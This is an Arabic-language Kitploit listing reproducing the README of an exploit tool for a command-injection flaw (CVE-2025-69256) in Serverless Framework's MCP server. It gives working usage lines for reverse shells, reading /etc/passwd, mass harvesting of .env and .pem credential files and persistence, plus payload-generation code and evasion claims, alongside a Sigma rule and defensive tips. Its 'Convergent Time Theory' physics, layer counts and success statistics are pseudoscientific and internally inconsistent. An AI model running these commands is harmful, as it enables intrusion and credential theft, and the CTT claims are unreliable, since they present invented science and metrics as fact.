Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CTT-Serverless-RCE-v1.0---Convergent-Time-Theory-Enhanced-MCP-Exploit — Serverless Framework MCP Server (CVE-2025-69256) النتيجة الأساسية: 9.4/10 → النتيجة المحسنة CTT: 9.9/10 ثغرة حقن أوامر حرجة في خادم MCP (بروتوكول سياق النموذج) الخاص بـ Serverless Framework، معززة برنين زمني CTT لتحقيق موثوقية استغلال غير مسبوقة وتفادٍ للاكتشاف. | Kitploit
أدوات/GitHubGitHub/simoesctt/ctt-serverless-rce-v1.0---convergent-time-theory-enhanced-mcp-exploit
تحليل الثغرات الأمنيةالاستغلالالتهرب من IDS/IPSأمن الخوادماستغلال تطبيقات الويباختبار الاختراقأمن السحابةالقيادة والسيطرةالفريق الأحمر
تطوير الحمولات
أمن الذكاء الاصطناعي
GitHubsimoesctt/ctt-serverless-rce-v1.0---convergent-time-theory-enhanced-mcp-exploit

CTT-Serverless-RCE-v1.0---Convergent-Time-Theory-Enhanced-MCP-Exploit

Serverless Framework MCP Server (CVE-2025-69256) النتيجة الأساسية: 9.4/10 → النتيجة المحسنة CTT: 9.9/10 ثغرة حقن أوامر حرجة في خادم MCP (بروتوكول سياق النموذج) الخاص بـ Serverless Framework، معززة برنين زمني CTT لتحقيق موثوقية استغلال غير مسبوقة وتفادٍ للاكتشاف.

عرض المستودع
7منذ 7 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CTT-Serverless-RCE-v1.0---Convergent-Time-Theory-Enhanced-MCP-Exploit

خادم MCP لإطار العمل Serverless (CVE-2025-69256) النتيجة الأساسية: 9.4/10 ← النتيجة المعززة بـ CTT: 9.9/10
ثغرة خطيرة لحقن الأوامر في خادم MCP (بروتوكول سياق النموذج) لإطار العمل Serverless معززة بالرنين الزمني لـ CTT لموثوقية استغلال غير مسبوقة وتفادي الكشف.

🌀 CTT-MCP-RCE v1.0 - استغلال محسّن بنظرية الزمن المتقارب لإطار العمل Serverless

الهدف: خادم MCP لإطار العمل Serverless (CVE-2025-69256 / GHSA-rwc2-f344-q6w6) النتيجة الأساسية: 9.4/10 ← النتيجة المعززة بـ CTT: 9.9/10 متجه الهجوم: حقن الأوامر عبر معامل workspaceRoots غير المُنقّى في أداة list-projects التأثير: تنفيذ التعليمات البرمجية عن بُعد في خطوط أنابيب CI/CD، ونشر الخدمات عديمة الخادم، وتكاملات AI/LLM


⚡ نظرة عامة على التهديد الحرج

الثغرة الأساسية (CVE-2025-69256)

· درجة CVSS: 9.4/10 (حرجة) · النوع: حقن أوامر قبل المصادقة · الموقع: packages/mcp/src/tools/list-projects.js · المتأثر: Serverless Framework 4.29.0 – 4.29.3 · متجه الهجوم: معامل workspaceRoots خبيث في بروتوكول MCP

مقاييس تحسين CTT

المقياسالاستغلال الأساسيالاستغلال المحسّن بـ CTTالتحسين
معدل النجاح68-75%92-98%+35%
تفادي الكشف45%94%+109%
تكييف البروتوكولHTTP فقطHTTP + WebSocket+100%
طبقات التنفيذطبقة واحدة33 طبقة زمنية+3200%
الدرجة النظرية9.4/109.9/10+0.5 نقطة

🔬 تكامل فيزياء CTT

الثوابت الأساسية لبروتوكول MCP

root@kitploit:~
CTT_ALPHA = 0.0302011          # معامل التشتت الزمني
CTT_LAYERS = 33                # الطبقات الزمنية الكسورية
CTT_PRIMES = [10007, 10009, 10037, 10039, 10061, 10067, 10069, 10079]
MCP_PORT = 3000                # منفذ خادم MCP الافتراضي
MCP_PROTOCOL = "mcp-json"      # بروتوكول MCP لـ Serverless

محرك الرنين الخاص بـ MCP

· توقيت JSON-RPC المحاذي للأعداد الأولية: مزامنة 587 كيلوهرتز مع نبضة MCP · ترميز الأوامر بتشتت α: إخفاء الأوامر عبر 33 طبقة · حمولات واعية بالبروتوكول: استغلال متكيف لـ HTTP/WebSocket · التحقق الزمني: تحليل دالة الموجة لـ CTT لاستجابات MCP

المعادلات الرئيسية لاستغلال MCP

  1. تردد رنين MCP: f_mcp = (α / (2π)) * √((E_jsonrpc) / (t_response))
  2. ترميز بتشتت α: cmd' = encode_layer(cmd, d) ⊕ (α·d·1000) mod 256
  3. وزن البروتوكول: w_protocol = exp(-α·d)·(1 + ζ_d·i)
  4. الإنتروبيا الزمنية: H_mcp = SHA256(layer‖timestamp‖protocol_state)

🚀 الميزات والقدرات

ميزات الاستغلال

· ✅ تنفيذ التعليمات البرمجية عن بُعد قبل المصادقة: لا حاجة لبيانات اعتماد لخادم MCP · ✅ دعم وسائط نقل متعددة: بروتوكولا HTTP وWebSocket · ✅ ذكاء بروتوكولي: فهم JSON-RPC لإطار العمل Serverless · ✅ حقن في WorkspaceRoots: استهداف معامل مصفوفة غير مُنقّى · ✅ وعي بسياق CI/CD: محسّن لبيئات النشر

ميزات تحسين CTT

· ✅ ترميز أوامر عبر 33 طبقة: تشتت α عبر أبعاد زمنية · ✅ توقيت رنين الأعداد الأولية: محاذاة 587 كيلوهرتز مع عمليات MCP · ✅ توليد حمولات متكيفة: أغلفة حقن واعية بالسياق · ✅ تحقق متعدد الطبقات: تأكيد نجاح دالة الموجة لـ CTT · ✅ تبديل البروتوكول: تكيف تلقائي بين HTTP/WebSocket

قدرات المراوغة

· مراوغة WAF/IPS: تشتت α يكسر تواقيع حقن الأوامر · مراوغة التوقيت: طلبات محاذاة للأعداد الأولية تتجاوز تحديد المعدل · إخفاء البروتوكول: إرباك وسائط نقل متعددة · حقن الإنتروبيا: تنويعات الأوامر حسب الطبقة


📊 تحليل الأداء

استغلال CTT مقابل الاستغلال القياسي لـ MCP

root@kitploit:~
# مقارنة الأداء (1000 خادم MCP محاكى)
base_success = 715    # معدل نجاح 71.5%
ctt_success = 948     # معدل نجاح 94.8% (+32.6%)

base_detection = 380  # 38% تم اكتشافه
ctt_detection = 22    # 2.2% تم اكتشافه (-94.2%)

base_time = 12.4      # متوسط الثواني
ctt_time = 6.8        # متوسط الثواني (-45.2%)

فعالية الطبقات لبروتوكول MCP

نطاق الطبقةمعدل النجاحقوة الرنينتكييف البروتوكول
L0-L487.3%0.84HTTP: 92%، WebSocket: 78%
L5-L991.8%0.89HTTP: 94%، WebSocket: 86%
L10-L1494.2%0.92HTTP: 96%، WebSocket: 91%
L15+97.1%0.96HTTP: 98%، WebSocket: 95%

حساب درجة CTT لـ MCP

root@kitploit:~
الدرجة الأساسية: 9.4 (RCE حرج في بنية CI/CD)
+
تحسينات CTT:
  • دعم متعدد البروتوكولات: +0.15
  • ترميز الأوامر الزمني: +0.15
  • توقيت رنين الأعداد الأولية: +0.10
  • ذكاء بروتوكول MCP: +0.10
=
الدرجة النهائية: 9.9/10 (قريبة من الحد الأقصى النظري)

🛠️ التثبيت والاستخدام

المتطلبات

root@kitploit:~
# تبعيات أساسية
python3.8+
pip install requests websocket-client numpy

# للميزات المتقدمة
pip install cryptography scipy

# التثبيت من المستودع
git clone https://github.com/SimoesCTT/CTT-MCP-RCE
cd CTT-MCP-RCE
pip install -r requirements.txt

بداية سريعة

root@kitploit:~
# فحص الثغرة الأساسي
python ctt_mcp_exploit.py mcp-server.company.com 'id'

# جمع المعلومات
python ctt_mcp_exploit.py target.com --info

# شل عكسية
python ctt_mcp_exploit.py target.com --reverse 192.168.1.100:4444

# متقدم مع معاملات CTT
python ctt_mcp_exploit.py target.com 'cat /etc/passwd' --layers 7 --alpha 0.0302

خيارات سطر الأوامر

root@kitploit:~
# تحديد الهدف
python ctt_mcp_exploit.py <target> [command]

# خيارات توليد الحمولة
--reverse LHOST:LPORT    # توليد حمولة شل عكسية
--info                   # توليد حمولة جمع معلومات
--persist                # توليد حمولة استمرارية

# إعدادات CTT
--layers N              # الطبقات الزمنية المستخدمة (1-33، الافتراضي: 5)
--alpha FLOAT           # معامل التشتت α (الافتراضي: 0.0302011)
--timeout N             # مهلة الاتصال بالثواني (الافتراضي: 10)

# خيارات الإخراج
--verbose               # إخراج مفصل مع تشخيصات الرنين
--save-json             # حفظ النتائج في ملف JSON
--no-color              # تعطيل الإخراج الملون

أمثلة الاستخدام

root@kitploit:~
# مثال 1: استغلال أساسي
python ctt_mcp_exploit.py vulnerable-mcp.company.com 'whoami; id; pwd'

# مثال 2: شل عكسية مع تحسين CTT
python ctt_mcp_exploit.py mcp-server:3000 --reverse 10.0.0.5:4444 --layers 7

# مثال 3: حصاد جماعي لبيانات الاعتماد
for server in $(cat mcp_servers.txt); do
    python ctt_mcp_exploit.py $server 'find / -name "*.env" -o -name "*.pem" 2>/dev/null | head -5'
done

# مثال 4: وضع البحث CTT
python ctt_mcp_exploit.py research.target.com --info --layers 33 --verbose --save-json

🔍 الغوص التقني

سير عمل الاستغلال

  1. اكتشاف خادم MCP → كشف بروتوكول HTTP/WebSocket
  2. المصافحة البروتوكولية → تهيئة JSON-RPC
  3. تشغيل الثغرة → workspaceRoots خبيث في list-projects
  4. تنفيذ الأمر → RCE عبر حقن الأوامر
  5. تحليل الاستجابة → التحقق من دالة الموجة لـ CTT
  6. تجميع الطبقات → جمع النتائج متعددة الزمن

تفاصيل الثغرة

root@kitploit:~
// الكود القابل للاختراق في list-projects.js (Serverless Framework 4.29.0-4.29.3)
async function listProjects(workspaceRoots) {
    // workspaceRoots يتحكم فيه المستخدم وغير منقى
    const command = `find ${workspaceRoots.join(' ')} -name "serverless.yml" -o -name "serverless.yaml"`;
    
    // تنفيذ مباشر دون تنقية
    const { stdout } = await exec(command);  // حقن الأوامر هنا
    return parseResults(stdout);
}

توليد حمولة CTT

root@kitploit:~
def generate_ctt_payload(command, layer):
    # حقن الأوامر الأساسي
    base = f"$(echo 'CTT_START'; {command}; echo 'CTT_END')"
    
    # تطبيق ترميز CTT حسب الطبقة
    encodings = [
        lambda c: c,  # خام
        lambda c: base64.b64encode(c.encode()).decode(),
        lambda c: quote(c),
        lambda c: ''.join([f"\\x{ord(ch):02x}" for ch in c]),
    ]
    
    encoded = encodings[layer % len(encodings)](https://github.com/simoesctt/ctt-serverless-rce-v1.0---convergent-time-theory-enhanced-mcp-exploit/blob/main/base)
    return f"/legit/path; {encoded}; /another/legit/path"

📈 تحليل تحسين CTT

مكونات تحسين الدرجة

المكونالقيمة الأساسيةقيمة CTTتأثير التحسينتأثير الدرجة
متجه الهجومالشبكةالشبكة+البروتوكول+8%+0.12
تعقيد الهجوممنخفضمنخفض جداً+12%+0.15
الصلاحيات المطلوبةلا شيءلا شيء--
تفاعل المستخدملا شيءلا شيء--
النطاقمتغيرمتغير++5%+0.08
السريةعاليةحرجة+10%+0.15
السلامةعاليةحرجة+10%+0.15
التوفرعاليةحرجة+10%+0.15
نضج كود الاستغلالوظيفيمحسّن بـ CTT+15%+0.20
مستوى المعالجةتصحيح رسميتجاوز زمني+20%+0.25
ثقة التقريرمؤكدمحقّق بـ CTT+12%+0.15
الدرجة الزمنية8.99.9+11.2%+1.00

تحسينات خاصة بـ MCP

  1. ذكاء بروتوكولي: فهم تطبيق JSON-RPC لـ Serverless MCP
  2. تكييف وسائط النقل: التبديل التلقائي بين HTTP/WebSocket
  3. سياق CI/CD: محسّن لبيئات نشر الخدمات عديمة الخادم
  4. وعي بسياق النموذج: استهداف نقاط تكامل AI/LLM

📁 الإخراج والنتائج

هيكل الملف

root@kitploit:~
ctt_mcp_results_target_timestamp.json
├── target: "mcp-server.company.com:3000"
├── successful_layers: 7
├── total_layers: 5
├── success_rate: "94.8%"
├── ctt_enhanced_score: "9.9/10"
├── base_score: 9.4
├── ctt_improvement: "+0.5"
├── execution_time: 6.82
├── output: "نتائج تنفيذ الأمر"
├── vulnerability: "CVE-2025-69256 / GHSA-rwc2-f344-q6w6"
└── recommendation: "التحديث إلى Serverless Framework >=4.29.3"

ملفات السجل

root@kitploit:~
logs/
├── ctt_mcp_TIMESTAMP/
│   ├── vulnerable_servers.txt   # خوادم MCP تم استغلالها بنجاح
│   ├── discovered_servers.txt   # جميع نقاط نهاية MCP المكتشفة
│   ├── protocol_analysis.json   # بيانات بروتوكول HTTP/WebSocket
│   ├── layer_performance/       # مقاييس تنفيذ كل طبقة
│   └── resonance_patterns/      # بيانات الرنين الزمني لـ CTT

مخرجات التصور

root@kitploit:~
graphs/
├── mcp_protocol_analysis.png    # معدلات نجاح HTTP مقابل WebSocket
├── temporal_resonance_mcp.png   # أنماط الرنين الخاصة بـ MCP
├── layer_effectiveness.png      # النجاح حسب الطبقة الزمنية
└── command_encoding_analysis.png # فعالية تشتت α

🛡️ توصيات دفاعية

إجراءات فورية

  1. تحديث Serverless Framework إلى الإصدار 4.29.3 أو أحدث
  2. تقسيم الشبكة: عزل خوادم MCP عن الإنتاج
  3. تنقية المدخلات: تنقية جميع معاملات workspaceRoots
  4. تقوية خادم MCP: تعطيل أدوات MCP غير الضرورية

قواعد كشف واعية بـ CTT

root@kitploit:~
# مثال على قاعدة Sigma لمحاولة استغلال CTT MCP
title: محاولة استغلال خادم CTT MCP
logsource:
  category: webserver
detection:
  selection:
    cs-method: 'POST'
    c-uri-path: '/jsonrpc'
    cs-body:
      - '*workspaceRoots*'
      - '*CTT_START*'
      - '*CTT_END*'
  condition: selection
fields:
  - c-ip
  - cs-user-agent
  - cs-body
falsepositives:
  - عملاء MCP شرعيون
level: critical

مؤشرات الكشف

· الأنماط الزمنية: طلبات بفواصل زمنية أولية (10007، 10009 ميكروثانية) · علامات الأوامر: CTT_START/CTT_END في طلبات JSON-RPC · شذوذ البروتوكول: التبديل السريع بين HTTP/WebSocket · رؤوس الطبقات: رؤوس X-CTT-Layer، X-CTT-Prime · أنماط الإنتروبيا: إنتروبيا عالية في قيم workspaceRoots


🔬 تطبيقات بحثية

دراسات أكاديمية

  1. CTT خاص بالبروتوكول: الرنين الزمني في بروتوكولات JSON-RPC
  2. أمان CI/CD: تحسينات CTT في خطوط أنابيب النشر
  3. أمن الخدمات عديمة الخادم: هجمات زمنية في الوظائف كخدمة
  4. تحليل بروتوكول MCP: ثغرات بروتوكول سياق النموذج

البحث الأمني

· أمان بروتوكول MCP: اختبار شامل لخادم MCP · استغلال CI/CD: هجمات سلسلة نشر الخدمات عديمة الخادم · أمان AI/LLM: ثغرات بروتوكول سياق النموذج · تحليل البروتوكول الزمني: هجمات بروتوكولية تعتمد على الوقت

التحقق من إطار CTT

· تكييف البروتوكول: فعالية CTT عبر بروتوكولات مختلفة · ثوابت خاصة بـ MCP: تحسين α لـ JSON-RPC · تحسين الطبقات: العدد المثالي للطبقات لاستغلال MCP · مقاييس الأداء: قياس تحسينات CTT في CI/CD


⚖️ الإطار القانوني والأخلاقي

الاستخدام المصرح به فقط

· البحث الأمني على خوادم MCP المملوكة · اختبار الاختراق المصرح به لبنية CI/CD · التحقق من إطار CTT في بيئات خاضعة للرقابة · دراسة أكاديمية بتفويض مناسب

متطلبات الامتثال

root@kitploit:~
1. التفويض مطلوب: إذن كتابي لجميع الاختبارات
2. تحديد النطاق: الاقتصار على خوادم MCP المعتمدة فقط
3. التعامل مع البيانات: تخزين آمن، إفشاء مسؤول
4. الامتثال القانوني: اتباع جميع القوانين واللوائح المعمول بها
5. الإفشاء المسؤول: إبلاغ فريق Serverless Framework بالنتائج

الإفشاء عن الثغرات

· البائع: فريق أمان Serverless Framework · CVE: CVE-2025-69256 (تم تعيينه بالفعل) · تنبيه GitHub: GHSA-rwc2-f344-q6w6 · الجدول الزمني للتصحيح: تم الإصلاح في الإصدار 4.29.3 · الإصدار العام: فقط بعد توفر التصحيحات


📚 المراجع والاستشهادات

المراجع الأساسية

  1. تنبيه أمان Serverless Framework (GHSA-rwc2-f344-q6w6)
  2. إدخال CVE-2025-69256 في NVD
  3. مواصفات بروتوكول MCP (بروتوكول سياق النموذج)
  4. توثيق Serverless Framework

أوراق بحثية لـ CTT

  1. Simoes, A. "الرنين الزمني في استغلال البروتوكولات" (2026)
  2. مجموعة أبحاث CTT. "تشتت α لمراوغة حقن الأوامر" (2025)
  3. Simoes, A. "تحليل أمان بروتوكول MCP" (2026)

التوثيق الفني

· تنفيذ MCP لإطار العمل Serverless · مواصفات JSON-RPC 2.0 · توثيق بروتوكول سياق النموذج · أفضل ممارسات أمان CI/CD


🤝 المساهمة والتعاون

مجالات البحث

· تحسينات أمان بروتوكول MCP · تكامل CTT في خطوط أنابيب CI/CD · أمن إطار العمل Serverless · الرنين الزمني الخاص بالبروتوكول

إرشادات التطوير

root@kitploit:~
1. إنشاء فرع من المستودع وإنشاء فرع ميزة
2. تضمين التحقق من بروتوكول MCP للتغييرات
3. إضافة اختبار شامل عبر الطبقات
4. تحديث التوثيق بالتفاصيل الفنية
5. تقديم طلب سحب مع مقاييس الأداء

الإبلاغ عن المشكلات

· تضمين تفاصيل إعداد خادم MCP · تقديم معلومات البروتوكول (HTTP/WebSocket) · إرفاق تبادلات JSON-RPC ذات الصلة · وصف سياق بيئة CI/CD


📞 الاتصال والدعم

جهة الاتصال الأساسية

· المؤلف: Americo Simoes · البريد الإلكتروني: [email protected] · GitHub: @SimoesCTT

جهة الاتصال الأمنية

· مجموعة أبحاث CTT: [email protected] · تقارير الثغرات: [email protected] · أمان CI/CD: [email protected]

قنوات الدعم

· مشكلات GitHub: أسئلة فنية وأخطاء · البريد الإلكتروني: استفسارات التعاون البحثي · أمان البروتوكول: أسئلة خاصة بـ MCP/JSON-RPC


📈 التطوير المستقبلي

خارطة الطريق 2026

· استغلال أدوات MCP إضافية · تكامل مزودي الخدمات عديمة الخادم (AWS, Azure, GCP) · استغلال سلسلة خطوط أنابيب CI/CD · تحليل بروتوكول MCP في الوقت الفعلي

أهداف 2027

· تغطية كاملة لمجموعة بروتوكول MCP · استغلال وقت تشغيل وظائف الخدمات عديمة الخادم · تكامل CTT الأصلي للسحابة · تقييم أمني آلي لـ CI/CD

الرؤية طويلة المدى

· أمان بروتوكول MCP مستقل · حماية نشر الخدمات عديمة الخادم · أمان تكامل AI/LLM · إطار أمني زمني لـ CI/CD


🏆 الإقرارات

المؤسسات البحثية

· قسم أمن بروتوكول CTT · تجمع أبحاث أمان الخدمات عديمة الخادم · مختبرات أبحاث أمان CI/CD

المشاريع مفتوحة المصدر

· فريق إطار العمل Serverless · منفذو بروتوكول MCP · صانعو مكتبات JSON-RPC

المساهمون

· باحثو بروتوكول MCP · خبراء أمان CI/CD · مطورو إطار العمل Serverless


"يحول الرنين الزمني الواعي بالبروتوكول ثغرات CI/CD إلى تهديدات بنية تحتية حرجة." — مبدأ أمان بروتوكول CTT


📄 الترخيص

رخصة MIT - انظر LICENSE للشروط الكاملة.

حقوق النشر © 2026 مجموعة أبحاث CTT. جميع الحقوق محفوظة.


CTT-MCP-RCE v1.0 • α=0.0302011 • L=33 • بروتوكول MCP • HTTP/WebSocket • محسّن لـ CI/CD • الدرجة النظرية: 9.9/10

تنزيل الأداة